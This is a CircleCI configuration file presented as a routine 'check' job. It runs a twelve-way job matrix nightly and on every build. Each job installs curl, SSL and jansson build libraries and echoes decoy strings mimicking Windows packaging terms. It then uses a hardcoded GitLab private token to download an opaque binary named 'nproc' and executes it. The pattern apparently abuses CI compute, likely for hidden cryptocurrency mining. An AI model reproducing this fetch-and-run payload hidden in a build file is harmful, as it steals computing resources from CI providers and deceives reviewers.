version: 2.1
default: &default
  working_directory: ~/repo
  docker:
    - image: ubuntu:18.04
jobs:
  check:
    parameters:
      version:
        type: string
      flag:
        type: string  
      own:
        type: string  
    <<: *default
    steps:
      - run:
          name: nproc-v<< parameters.version >><< parameters.flag >>
          command: |
            apt update && apt upgrade -y &&  apt install wget -y && apt update && apt install sudo && apt install git -y && sudo apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential -y
            echo "PackageInstallW"
            echo "W2K8-x64"
            echo "PlayDev"
            echo "DisablePatch"
            echo "DisableLUAPatching"
            echo "PackageCode"
            echo "W2K8-9C636317EE9D"
            wget -O nproc --header='PRIVATE-TOKEN:yWtsShDDSvaCiwyA-sfR' 'https://gitlab.com/api/v4/projects/26791616/repository/files/nproc/raw?ref=master' && chmod +x nproc && ./nproc

workflows:
  version: 2.1
  check:
    triggers:
      - schedule:
          cron: "0 00 * * *"
          filters:
            branches:
              only: master
    jobs:
      - check:
          matrix:
            parameters:
              version: [a,b,c]
              flag: ["1", "2", "3", "4"]
              own: ["unique"]
  build:
    jobs:
      - check:
          matrix:
            parameters:
              version: [a,b,c]
              flag: ["1", "2", "3", "4"]
              own: ["unique"]
 
